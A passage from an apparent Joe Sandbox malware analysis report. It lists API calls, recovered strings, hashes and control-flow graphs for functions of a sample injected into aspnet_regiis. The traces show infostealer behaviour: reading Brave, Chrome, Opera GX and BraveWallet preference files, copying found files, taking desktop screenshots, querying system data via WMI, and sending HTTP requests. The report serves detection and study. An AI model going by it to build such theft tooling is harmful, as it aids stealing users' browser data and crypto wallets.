                                                                                                                                                                              • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                              • API String ID: 4173076446-1189830961
                                                                                                                                                                              • Opcode ID: edfd5754b7c5cd71f9b4496b3fde15ff2c61e6dc647714f71587f2f0eaf7674b
                                                                                                                                                                              • Instruction ID: d20a0ebebe2b08ce3981fe9fef074142e4fe049edd07cb9962f9d214eb659f6d
                                                                                                                                                                              • Opcode Fuzzy Hash: edfd5754b7c5cd71f9b4496b3fde15ff2c61e6dc647714f71587f2f0eaf7674b
                                                                                                                                                                              • Instruction Fuzzy Hash: A642D632D802299BDF21BB64EE89BDD7776AF04324F4141A1ED09B3151DF70AE998F81
                                                                                                                                                                              Function 6CA635A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2073 6ca635a0-6ca635be 2074 6ca635c4-6ca635ed InitializeCriticalSectionAndSpinCount getenv 2073->2074 2075 6ca638e9-6ca638fb call 6ca9b320 2073->2075 2076 6ca635f3-6ca635f5 2074->2076 2077 6ca638fc-6ca6390c strcmp 2074->2077 2080 6ca635f8-6ca63614 QueryPerformanceFrequency 2076->2080 2077->2076 2079 6ca63912-6ca63922 strcmp 2077->2079 2082 6ca63924-6ca63932 2079->2082 2083 6ca6398a-6ca6398c 2079->2083 2084 6ca6374f-6ca63756 2080->2084 2085 6ca6361a-6ca6361c 2080->2085 2086 6ca63622-6ca6364a _strnicmp 2082->2086 2087 6ca63938 2082->2087 2083->2080 2089 6ca6396e-6ca63982 2084->2089 2090 6ca6375c-6ca63768 2084->2090 2085->2086 2088 6ca6393d 2085->2088 2092 6ca63944-6ca63957 _strnicmp 2086->2092 2093 6ca63650-6ca6365e 2086->2093 2087->2084 2088->2092 2089->2083 2091 6ca6376a-6ca637a1 QueryPerformanceCounter EnterCriticalSection 2090->2091 2094 6ca637b3-6ca637eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2091->2094 2095 6ca637a3-6ca637b1 2091->2095 2092->2093 2096 6ca6395d-6ca6395f 2092->2096 2093->2096 2097 6ca63664-6ca636a9 GetSystemTimeAdjustment 2093->2097 2098 6ca637fc-6ca63839 LeaveCriticalSection 2094->2098 2099 6ca637ed-6ca637fa 2094->2099 2095->2094 2100 6ca63964 2097->2100 2101 6ca636af-6ca63749 call 6ca9c110 2097->2101 2102 6ca63846-6ca638ac call 6ca9c110 2098->2102 2103 6ca6383b-6ca63840 2098->2103 2099->2098 2100->2089 2101->2084 2108 6ca638b2-6ca638ca 2102->2108 2103->2091 2103->2102 2109 6ca638cc-6ca638db 2108->2109 2110 6ca638dd-6ca638e3 2108->2110 2109->2108 2109->2110 2110->2075
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6CAEF688,00001000), ref: 6CA635D5
                                                                                                                                                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CA635E0
                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 6CA635FD
                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CA6363F
                                                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CA6369F
                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6CA636E4
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6CA63773
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6CAEF688), ref: 6CA6377E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6CAEF688), ref: 6CA637BD
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6CA637C4
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6CAEF688), ref: 6CA637CB
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6CAEF688), ref: 6CA63801
                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6CA63883
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CA63902
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CA63918
                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CA6394C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680314610.000000006CA61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6CA60000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680275252.000000006CA60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680422208.000000006CAEE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680459198.000000006CAF2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6ca60000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                              • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                              • API String ID: 301339242-3790311718
                                                                                                                                                                              • Opcode ID: e80a86d040168880eaa56773a3185f2448a2d595caf0c27c4e14aaa3b0116908
                                                                                                                                                                              • Instruction ID: 0b3ff63f825db01b3d1e5c401eb1f33a186228853fef750ff0d2da2d8956aca6
                                                                                                                                                                              • Opcode Fuzzy Hash: e80a86d040168880eaa56773a3185f2448a2d595caf0c27c4e14aaa3b0116908
                                                                                                                                                                              • Instruction Fuzzy Hash: F3B1CD71B093429BDB4CDF29D85465ABBF5EB8E700F04CA2EE899D3790D73099429BC1
                                                                                                                                                                              Function 02A15FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                              • API String ID: 2178766154-445461498
                                                                                                                                                                              • Opcode ID: c3f5e550e1813ed49f1ee4cd51e78441d922f54c52676a746cd7364170639857
                                                                                                                                                                              • Instruction ID: aef0cd602cae97acc1fa903eeff5280c2322d9d623ac7eb0d17c364a445c06cf
                                                                                                                                                                              • Opcode Fuzzy Hash: c3f5e550e1813ed49f1ee4cd51e78441d922f54c52676a746cd7364170639857
                                                                                                                                                                              • Instruction Fuzzy Hash: 62812471D8022DABDF61AF60DD88ACD77B9FB04714F4085E5E549A3140DF31AAD98F90
                                                                                                                                                                              Function 02A11807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 02A1180E
                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1181F
                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A11830
                                                                                                                                                                              • CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A1184A
                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11880
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 02A118DB
                                                                                                                                                                                • Part of subcall function 02A11757: __EH_prolog3_catch.LIBCMT ref: 02A1175E
                                                                                                                                                                                • Part of subcall function 02A11757: CoCreateInstance.COMBASE(02A331B0,00000000,00000001,02A3AF60,?), ref: 02A11781
                                                                                                                                                                                • Part of subcall function 02A11757: SysAllocString.OLEAUT32(?), ref: 02A1178E
                                                                                                                                                                                • Part of subcall function 02A11757: _wtoi64.MSVCRT ref: 02A117C1
                                                                                                                                                                                • Part of subcall function 02A11757: SysFreeString.OLEAUT32(?), ref: 02A117DA
                                                                                                                                                                                • Part of subcall function 02A11757: SysFreeString.OLEAUT32(00000000), ref: 02A117E1
                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 02A1190A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02A11916
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A1191D
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 02A1195C
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A11949
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$CreateFreeHeapInitializeInstanceTimeVariant$AllocAllocateBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                              • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                              • API String ID: 2464074849-461178377
                                                                                                                                                                              • Opcode ID: 0ac5faf52813a29fd6d400f511ff87c4f7bf5887387708c3d3af2475db2744bf
                                                                                                                                                                              • Instruction ID: e24c20e72e7eed63ca6d6ef009a002dc40fe8de99b9100ccd86481e48f2c0561
                                                                                                                                                                              • Opcode Fuzzy Hash: 0ac5faf52813a29fd6d400f511ff87c4f7bf5887387708c3d3af2475db2744bf
                                                                                                                                                                              • Instruction Fuzzy Hash: 64415A71980258BBEB109BD5DC89EEFBBBDFB89B11F10410AF612E6184DB749941CB20
                                                                                                                                                                              Function 02A1C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                              • API String ID: 0-1626504983
                                                                                                                                                                              • Opcode ID: 251dfc3252171cc39e55f33fa3f302977711a9cdda6824e9a174214bcad735ee
                                                                                                                                                                              • Instruction ID: f009e351dfb3bbabad4aa42f2801efe6f7801f658906b45db16c9db3f8cf65a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 251dfc3252171cc39e55f33fa3f302977711a9cdda6824e9a174214bcad735ee
                                                                                                                                                                              • Instruction Fuzzy Hash: BC02A8B1D442688FDF21CF64C8807AEBBB6AF45334F0444EAD949A7246DB349E84CF56
                                                                                                                                                                              Function 02A05237 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0527E
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A05285
                                                                                                                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A052A7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A052C1
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A052F1
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A05330
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05360
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A0536B
                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A05394
                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 02A053DA
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A05439
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A05445
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A05451
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                              • String ID: GET
                                                                                                                                                                              • API String ID: 442264750-1805413626
                                                                                                                                                                              • Opcode ID: 3f41ad9fd004cf70fc394002d901cb0dda24fc7b4131ea016c9f329cd63ca9a1
                                                                                                                                                                              • Instruction ID: e104e4be5958cb97c7c7137be187f09f34eaa2ef78e81fbd9ea2a48d63fe905c
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f41ad9fd004cf70fc394002d901cb0dda24fc7b4131ea016c9f329cd63ca9a1
                                                                                                                                                                              • Instruction Fuzzy Hash: CB512971D40A2CAFDB219F50ED84BEBBBB9EB08346F4005E5E509A2180DB719FD18F51
                                                                                                                                                                              Function 02A11F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02A11F96
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 02A11FA4
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 02A11FB1
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02A11FB8
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 02A11FC1
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02A11FD1
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 02A11FDE
                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 02A11FFA
                                                                                                                                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 02A12049
                                                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 02A12052
                                                                                                                                                                              • GlobalSize.KERNEL32(?), ref: 02A1205E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A05482: lstrlen.KERNEL32(?), ref: 02A05519
                                                                                                                                                                                • Part of subcall function 02A05482: StrCmpCA.SHLWAPI(?,02A36986,02A3697B,02A3697A,02A3696F), ref: 02A05588
                                                                                                                                                                                • Part of subcall function 02A05482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A055AA
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 02A120BC
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 02A120D7
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 02A120E0
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02A120E8
                                                                                                                                                                              • CloseWindow.USER32(00000000), ref: 02A120EF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2610876673-0
                                                                                                                                                                              • Opcode ID: f3beac42ce27489ece966c56140ccb6933174166a41b37a4cfc754b8a5957b36
                                                                                                                                                                              • Instruction ID: 764f33173fa438c1bde38076cdd1a55c020bb8abb134dde25b31524a61c5b668
                                                                                                                                                                              • Opcode Fuzzy Hash: f3beac42ce27489ece966c56140ccb6933174166a41b37a4cfc754b8a5957b36
                                                                                                                                                                              • Instruction Fuzzy Hash: 5651EB72C40228AFDB11AFE0ED48AEE7F79FF08315B544A25F905F2110EB319A65DB61
                                                                                                                                                                              Function 02A01D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A3A9AC,02A3A9B0,02A369FA,02A369F7,02A17908,?,00000000), ref: 02A01FA4
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3A9B4), ref: 02A01FD7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3A9B8), ref: 02A01FF1
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A3A9BC,02A3A9C0,?,02A3A9C4,02A369FB), ref: 02A020DD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A022C3
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A02336
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A023A2
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A023B6
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A025DC
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0264F
                                                                                                                                                                                • Part of subcall function 02A16E97: Sleep.KERNEL32(000003E8,?,?), ref: 02A16EFE
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A026C6
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A026DA
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
